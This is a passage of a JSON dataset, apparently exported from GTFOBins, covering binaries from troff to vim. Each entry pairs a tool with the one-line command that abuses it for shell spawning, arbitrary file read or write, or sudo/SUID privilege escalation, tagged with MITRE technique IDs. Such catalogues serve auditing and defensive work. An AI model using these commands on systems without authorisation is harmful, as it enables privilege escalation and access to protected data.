-l`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/troff/"]},{"id":"gtfo:troff:file-read:0:suid","toolId":"gtfo:troff","toolName":"troff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"troff /path/to/input-file","description":"The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/troff/"]},{"id":"gtfo:troff:file-read:0:unprivileged","toolId":"gtfo:troff","toolName":"troff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"troff /path/to/input-file","description":"The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/troff/"]},{"id":"gtfo:tsc:file-read:0:sudo","toolId":"gtfo:tsc","toolName":"tsc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tsc /path/to/input-file.ts","description":"Content is leaked as error messages. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tsc/"]},{"id":"gtfo:tsc:file-read:0:unprivileged","toolId":"gtfo:tsc","toolName":"tsc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tsc /path/to/input-file.ts","description":"Content is leaked as error messages. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tsc/"]},{"id":"gtfo:tsc:file-write:0:sudo","toolId":"gtfo:tsc","toolName":"tsc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tsc /path/to/input-file.ts --outFile /path/to/output-file","description":"Content is leaked as error messages and written to file. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tsc/"]},{"id":"gtfo:tsc:file-write:0:unprivileged","toolId":"gtfo:tsc","toolName":"tsc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"tsc /path/to/input-file.ts --outFile /path/to/output-file","description":"Content is leaked as error messages and written to file. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tsc/"]},{"id":"gtfo:tshark:inherit:0:sudo","toolId":"gtfo:tshark","toolName":"tshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\ntshark -Xlua_script:/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tshark/"]},{"id":"gtfo:tshark:inherit:0:unprivileged","toolId":"gtfo:tshark","toolName":"tshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\ntshark -Xlua_script:/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tshark/"]},{"id":"gtfo:ul:file-read:0:sudo","toolId":"gtfo:ul","toolName":"ul","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ul /path/to/input-file","description":"The read file content is corrupted by replacing occurrences of `$'\\b_'` to terminal sequences and by converting tabs to spaces.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ul/"]},{"id":"gtfo:ul:file-read:0:suid","toolId":"gtfo:ul","toolName":"ul","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ul /path/to/input-file","description":"The read file content is corrupted by replacing occurrences of `$'\\b_'` to terminal sequences and by converting tabs to spaces.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ul/"]},{"id":"gtfo:ul:file-read:0:unprivileged","toolId":"gtfo:ul","toolName":"ul","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ul /path/to/input-file","description":"The read file content is corrupted by replacing occurrences of `$'\\b_'` to terminal sequences and by converting tabs to spaces.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ul/"]},{"id":"gtfo:unexpand:file-read:0:sudo","toolId":"gtfo:unexpand","toolName":"unexpand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"unexpand -t999 /path/to/input-file","description":"Convert sequences of (e.g., `999`) spaces to tab.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unexpand/"]},{"id":"gtfo:unexpand:file-read:0:suid","toolId":"gtfo:unexpand","toolName":"unexpand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"unexpand -t999 /path/to/input-file","description":"Convert sequences of (e.g., `999`) spaces to tab.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unexpand/"]},{"id":"gtfo:unexpand:file-read:0:unprivileged","toolId":"gtfo:unexpand","toolName":"unexpand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"unexpand -t999 /path/to/input-file","description":"Convert sequences of (e.g., `999`) spaces to tab.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/unexpand/"]},{"id":"gtfo:uniq:file-read:0:sudo","toolId":"gtfo:uniq","toolName":"uniq","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uniq /path/to/input-file","description":"The read file content is corrupted by squashing multiple adjacent lines.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/uniq/"]},{"id":"gtfo:uniq:file-read:0:suid","toolId":"gtfo:uniq","toolName":"uniq","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uniq /path/to/input-file","description":"The read file content is corrupted by squashing multiple adjacent lines.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/uniq/"]},{"id":"gtfo:uniq:file-read:0:unprivileged","toolId":"gtfo:uniq","toolName":"uniq","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"uniq /path/to/input-file","description":"The read file content is corrupted by squashing multiple adjacent lines.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/uniq/"]},{"id":"gtfo:unshare:shell:0:sudo","toolId":"gtfo:unshare","toolName":"unshare","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"unshare /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unshare/"]},{"id":"gtfo:unshare:shell:0:suid","toolId":"gtfo:unshare","toolName":"unshare","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"unshare -r /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unshare/"]},{"id":"gtfo:unshare:shell:0:unprivileged","toolId":"gtfo:unshare","toolName":"unshare","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"unshare /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/unshare/"]},{"id":"gtfo:unsquashfs:privilege-escalation:0:sudo","toolId":"gtfo:unsquashfs","toolName":"unsquashfs","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unsquashfs shell\n./squashfs-root/sh -p","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unsquashfs/"]},{"id":"gtfo:unsquashfs:privilege-escalation:0:suid","toolId":"gtfo:unsquashfs","toolName":"unsquashfs","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unsquashfs shell\n./squashfs-root/sh -p","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unsquashfs/"]},{"id":"gtfo:unzip:privilege-escalation:0:sudo","toolId":"gtfo:unzip","toolName":"unzip","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unzip -K shell.zip\n./sh -p","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unzip/"]},{"id":"gtfo:unzip:privilege-escalation:0:suid","toolId":"gtfo:unzip","toolName":"unzip","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unzip -K shell.zip\n./sh -p","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unzip/"]},{"id":"gtfo:update-alternatives:file-write:0:sudo","toolId":"gtfo:update-alternatives","toolName":"update-alternatives","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nupdate-alternatives --force --install /path/to/output-file x /path/to/temp-file 0","description":"Write in `/path/to/output-file` a symlink to `/path/to/temp-file`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/update-alternatives/"]},{"id":"gtfo:update-alternatives:file-write:0:suid","toolId":"gtfo:update-alternatives","toolName":"update-alternatives","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nupdate-alternatives --force --install /path/to/output-file x /path/to/temp-file 0","description":"Write in `/path/to/output-file` a symlink to `/path/to/temp-file`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/update-alternatives/"]},{"id":"gtfo:urlget:file-read:0:sudo","toolId":"gtfo:urlget","toolName":"urlget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"urlget - /path/to/input-file","description":"This is part of `gettext` and usually not in `PATH`, e.g., on Arch it can be found at `/usr/lib/gettext/urlget`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/urlget/"]},{"id":"gtfo:urlget:file-read:0:suid","toolId":"gtfo:urlget","toolName":"urlget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"urlget - /path/to/input-file","description":"This is part of `gettext` and usually not in `PATH`, e.g., on Arch it can be found at `/usr/lib/gettext/urlget`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/urlget/"]},{"id":"gtfo:urlget:file-read:0:unprivileged","toolId":"gtfo:urlget","toolName":"urlget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"urlget - /path/to/input-file","description":"This is part of `gettext` and usually not in `PATH`, e.g., on Arch it can be found at `/usr/lib/gettext/urlget`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/urlget/"]},{"id":"gtfo:uuencode:file-read:0:sudo","toolId":"gtfo:uuencode","toolName":"uuencode","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uuencode /path/to/input-file /dev/stdout | uudecode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/uuencode/"]},{"id":"gtfo:uuencode:file-read:0:suid","toolId":"gtfo:uuencode","toolName":"uuencode","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uuencode /path/to/input-file /dev/stdout | uudecode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/uuencode/"]},{"id":"gtfo:uuencode:file-read:0:unprivileged","toolId":"gtfo:uuencode","toolName":"uuencode","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"uuencode /path/to/input-file /dev/stdout | uudecode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/uuencode/"]},{"id":"gtfo:uv:shell:0:sudo","toolId":"gtfo:uv","toolName":"uv","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"uv run /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/uv/"]},{"id":"gtfo:uv:shell:0:unprivileged","toolId":"gtfo:uv","toolName":"uv","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"uv run /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/uv/"]},{"id":"gtfo:vagrant:inherit:0:sudo","toolId":"gtfo:vagrant","toolName":"vagrant","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"echo '...' >Vagrantfile\nvagrant up","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vagrant/"]},{"id":"gtfo:vagrant:inherit:0:unprivileged","toolId":"gtfo:vagrant","toolName":"vagrant","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"echo '...' >Vagrantfile\nvagrant up","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vagrant/"]},{"id":"gtfo:valgrind:shell:0:sudo","toolId":"gtfo:valgrind","toolName":"valgrind","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"valgrind /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/valgrind/"]},{"id":"gtfo:valgrind:shell:0:unprivileged","toolId":"gtfo:valgrind","toolName":"valgrind","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"valgrind /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/valgrind/"]},{"id":"gtfo:varnishncsa:file-write:0:sudo","toolId":"gtfo:varnishncsa","toolName":"varnishncsa","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"varnishncsa -g request -q 'ReqURL ~ \"/xxxxxxxxxx\"' -F '%{yyy}i' -w /path/to/output-file","description":"The command hangs, so the trigger command must be performed asynchronously or in another terminal:\n\n```\ncurl -H 'xxx: DATA' http://localhost:6081/xxxxxxxxxx\n```","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/varnishncsa/"]},{"id":"gtfo:varnishncsa:file-write:0:suid","toolId":"gtfo:varnishncsa","toolName":"varnishncsa","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"varnishncsa -g request -q 'ReqURL ~ \"/xxxxxxxxxx\"' -F '%{yyy}i' -w /path/to/output-file","description":"The command hangs, so the trigger command must be performed asynchronously or in another terminal:\n\n```\ncurl -H 'xxx: DATA' http://localhost:6081/xxxxxxxxxx\n```","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/varnishncsa/"]},{"id":"gtfo:vi:file-read:0:sudo","toolId":"gtfo:vi","toolName":"vi","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vi /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:file-read:0:suid","toolId":"gtfo:vi","toolName":"vi","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vi /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:file-read:0:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"vi /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:file-write:0:sudo","toolId":"gtfo:vi","toolName":"vi","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"vi /path/to/output-file\niDATA\n^[\nw","description":"Where `^[` is the escape key.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:file-write:0:suid","toolId":"gtfo:vi","toolName":"vi","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"vi /path/to/output-file\niDATA\n^[\nw","description":"Where `^[` is the escape key.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:file-write:0:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"vi /path/to/output-file\niDATA\n^[\nw","description":"Where `^[` is the escape key.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:0:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':!/bin/sh' /dev/null","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:0:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':!/bin/sh' /dev/null","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:0:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c ':!/bin/sh' /dev/null","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:1:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':shell'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:1:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':shell'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:1:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c ':shell'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:2:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':set shell=/bin/sh | shell'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:2:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':set shell=/bin/sh\\ -p | shell'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:2:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c ':set shell=/bin/sh | shell'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:3:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c :terminal /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:3:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':terminal /bin/sh -p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:3:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c :terminal /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vigr:inherit:0:sudo","toolId":"gtfo:vigr","toolName":"vigr","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vigr","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vigr/"]},{"id":"gtfo:vigr:inherit:0:suid","toolId":"gtfo:vigr","toolName":"vigr","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vigr","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vigr/"]},{"id":"gtfo:vim:file-read:0:sudo","toolId":"gtfo:vim","toolName":"vim","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vim -c ':redir! >/path/to/output-file | echo \"DATA\" | redir END | q'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:file-read:0:suid","toolId":"gtfo:vim","toolName":"vim","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vim -c ':redir! >/path/to/output-file | echo \"DATA\" | redir END | q'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:file-read:0:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"vim -c ':redir! >/path/to/output-file | echo \"DATA\" | redir END | q'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:0:sudo","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"vim -c ':py ...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:0:suid","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"vim -c ':py ...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:0:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← python","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"vim -c ':py ...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:1:sudo","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← lua","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"vim -c ':lua ...'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:1:suid","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← lua","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"vim -c ':lua ...'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:1:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← lua","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"vim -c ':lua ...'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:2:sudo","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vim","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:2:suid","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution","Privilege 